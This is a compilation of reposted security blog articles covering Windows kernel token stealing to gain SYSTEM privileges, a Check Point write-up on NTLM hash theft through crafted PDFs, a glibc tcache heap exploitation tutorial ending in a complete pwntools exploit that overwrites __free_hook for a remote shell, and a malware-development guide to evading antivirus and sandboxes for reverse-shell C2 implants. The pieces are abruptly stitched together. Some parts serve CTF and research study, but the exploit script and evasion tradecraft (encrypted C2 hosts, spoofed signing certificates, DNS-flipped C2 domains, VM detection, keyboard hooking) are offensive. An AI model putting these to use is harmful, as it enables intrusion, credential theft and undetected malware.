This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
Privs:
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> dq <LSASS_PROCESS_ADDRESS>+0x208 L1
kd> ? <LSASS_TOKEN_ADDRESS> & FFFFFFFF`FFFFFFF0
kd> !process 0 0 cmd.exe
kd> eq <CMD_EPROCESS_ADDRESS+0x208> <LSASS_TOKEN_ADDRESS>

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

NTLM Credentials Theft via PDF Files

( Original text by research.checkpoint.com )

Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can also reveal that NTLM hash leaks can also be achieved via PDF files with no user interaction or exploitation.

According to Check Point researchers, rather than exploiting the vulnerability in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can then use this to inject malicious content into a PDF and so when that PDF is opened, the target automatically leaks credentials in the form of NTLM hashes.

PDF Background

A PDF file consists primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects:

  • Boolean values
  • Integers and real numbers
  • Strings
  • Names
  • Arrays
  • Streams
  • The null object
  • Dictionaries

A dictionary object is a table containing pairs of objects, called entries.  The first element of each entry is the key and the second element is the value. The key must be a name, and the value may be any kind of object, including another dictionary. The pages of a document are represented by dictionary objects called page objects.  The page objects consist of several required and optional entries.

Proof of Concept

The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry).  The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:

  • /S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
  • /F entry: Exists in GoToR and GoToE, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.
  • /D entry: Describes the location to go to within the document.

By injecting a malicious entry (using the fields described above together with his SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details.

Figure 1: PoC – Injected GoToE action.

In addition, from the target’s perspective there is no evidence or any security alert of the attacker’s activity, which makes it impossible to notice abnormal behavior.

Figure 2: The crafted PDF file has no evidence of the attacker’s actions.

The NTLM details are leaked through the SMB traffic and sent to the attacker’s server which can be further used to cause various SMB relay attacks.

Figure 3: The Leaked NTLM details after the crafted PDF is opened.

 

Affected Products and Mitigation

Our investigation lead us to conclude that all Windows PDF-viewers are vulnerable to this security flaw and will reveal the NTLM credentials.

Disclosure

The issue was disclosed both to Adobe and Foxit.

Foxit indeed fixed the issue as part of 9.1 release.

Adobe fixed the vulnerability as part of the Adobe Reader version released in May (CVE-2018-4993).

IPS Prevention

Check Point customers are protected by the IPS protection:

Multiple PDF readers NTLMv2 Credential Theft

We would also like to thank our colleagues, Assaf Baharav, Yaron Fruchtmann, and Ido Solomon for their help in this research.

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

